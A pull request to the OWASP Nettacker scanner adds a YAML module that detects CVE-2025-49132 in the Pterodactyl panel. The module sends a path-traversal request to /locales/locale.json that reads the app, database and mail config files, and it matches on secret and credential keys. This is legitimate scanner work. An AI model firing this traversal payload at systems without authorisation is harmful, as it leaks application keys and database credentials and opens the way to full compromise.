### PR TITLE
Added new vulnerability module for CVE-2025-49132

### DIFF
--- a/docs/Modules.md
+++ b/docs/Modules.md
@@ -175,6 +175,7 @@ If you want to scan all ports please define -g 1-65535 range. Otherwise Nettacke
 - '**phpinfo_cve_2021_37704_vuln**' – check the target for phpinfo CVE-2021-37704 information disclosure
 - '**placeos_cve_2021_41826_vuln**' – check the target for PlaceOS CVE-2021-41826 vulnerability
 - '**prestashop_cve_2021_37538_vuln**' – check the target for PrestaShop CVE-2021-37538 vulnerability
+- '**pterodactyl_cve_2025_49132_vuln**' - check the target for CVE-2025-49132 vulnerability
 - '**puneethreddyhc_sqli_cve_2021_41648_vuln**' – check the target for SQL injection CVE-2021-41648
 - '**puneethreddyhc_sqli_cve_2021_41649_vuln**' – check the target for SQL injection CVE-2021-41649
 - '**qsan_storage_xss_cve_2021_37216_vuln**' – check the target for QSAN CVE-2021-37216 XSS vulnerability
@@ -203,7 +204,6 @@ If you want to scan all ports please define -g 1-65535 range. Otherwise Nettacke
 - '**x_powered_by_vuln**' – check if the web server is leaking server configuration in 'X-Powered-By' response header
 - '**x_xss_protection_vuln**' – check if header 'X-XSS-Protection' is missing or misconfigured
 - '**zoho_cve_2021_40539_vuln**' – check the target for Zoho CVE-2021-40539 vulnerability
-
 
 ## Brute Modules
 

--- a/nettacker/modules/vuln/pterodactyl_cve_2025_49132.yaml
+++ b/nettacker/modules/vuln/pterodactyl_cve_2025_49132.yaml
@@ -1,0 +1,55 @@
+info:
+  name: pterodactyl_cve_2025_49132_vuln
+  author: Sankalp Bansal
+  severity: 10.0
+  description: >
+    CVE_2025_49132 is a critical vulnerability in Pterodactyl(v.<1.11.11), a free, open
+    -source game server management panel. Using the /locales/locale.json with the locale
+    and namespace query parameters, a malicious actor is able to execute arbitrary code
+    without being authenticated which can lead to complete system compromise.
+  reference:
+    - https://www.exploit-db.com/exploits/52341
+    - https://nvd.nist.gov/vuln/detail/cve-2025-49132
+    - https://github.com/pterodactyl/panel/tree/1.0-develop/config
+  profiles:
+    - http
+    - critical_severity
+    - cve
+    - cve_2025
+    - vuln
+    - pterodactyl
+
+payloads:
+  - library: http
+    steps:
+      - method: get
+        timeout: 3
+        headers:
+          User-Agent: "{user_agent}"
+        ssl: false
+        url:
+          nettacker_fuzzer:
+            input_format: "{{schema}}://{target}:{{ports}}/locales/locale.json?locale=../../../pterodactyl&namespace=config/{{paths}}"
+            prefix: ""
+            suffix: ""
+            interceptors:
+            data:
+              schema:
+                - "http"
+                - "https"
+              ports:
+                - 80
+                - 443
+              paths:
+                - "app"
+                - "database"
+                - "mail"
+        response:
+          condition_type: and
+          conditions:
+            status_code:
+              regex: "200"
+              reverse: false
+            content:
+              regex: "\"(key|cipher|debug|connections|host|database|username|driver)\"\\s*:"
+              reverse: false


### PR DESCRIPTION
<!--
  Thanks for contributing to OWASP Nettacker!
-->

## Proposed change

<!--
  Describe the big picture of your changes.
  Don't forget to link your PR to an existing issue if any.
-->

CVE-2025-49132 is a critical vulnerability in Pterodactyl `(v.<1.11.11)`, a free, open -source game server management panel. Using the /locales/locale.json with the locale and namespace query parameters, a malicious actor is able to execute arbitrary code without being authenticated which can lead to complete system compromise.

**Testing:**
1. For the vulnerable server, I used the HTB Lab which was vulnerable to this CVE.
2. For non-vulnerable server I deployed a local image of `pterodactyl panel v.1.11.11`.

It successfully passed both tests.

## Type of change

<!--
  Type of change you want to introduce. Please, check one (1) box only!
  If your PR requires multiple boxes to be checked, most likely it needs to
  be split into multiple PRs.
-->

- [ ] New core framework functionality
- [ ] Bugfix (non-breaking change which fixes an issue)
- [ ] Code refactoring without any functionality changes
- [x] New or existing module/payload change
- [ ] Documentation/localization improvement
- [ ] Test coverage improvement
- [ ] Dependency upgrade
- [ ] Other improvement (best practice, cleanup, optimization, etc)

## Checklist

<!--
  Put an `x` in the boxes that apply. You can change them after PR is created.
-->

- [x] I've followed the [contributing guidelines][contributing-guidelines]
- [x] I've run `make pre-commit`, it didn't generate any changes
- [x] I've run `make test`, all tests passed locally

<!--
  Thanks again for your contribution!
-->

[contributing-guidelines]: https://nettacker.readthedocs.io/en/latest/Developers/
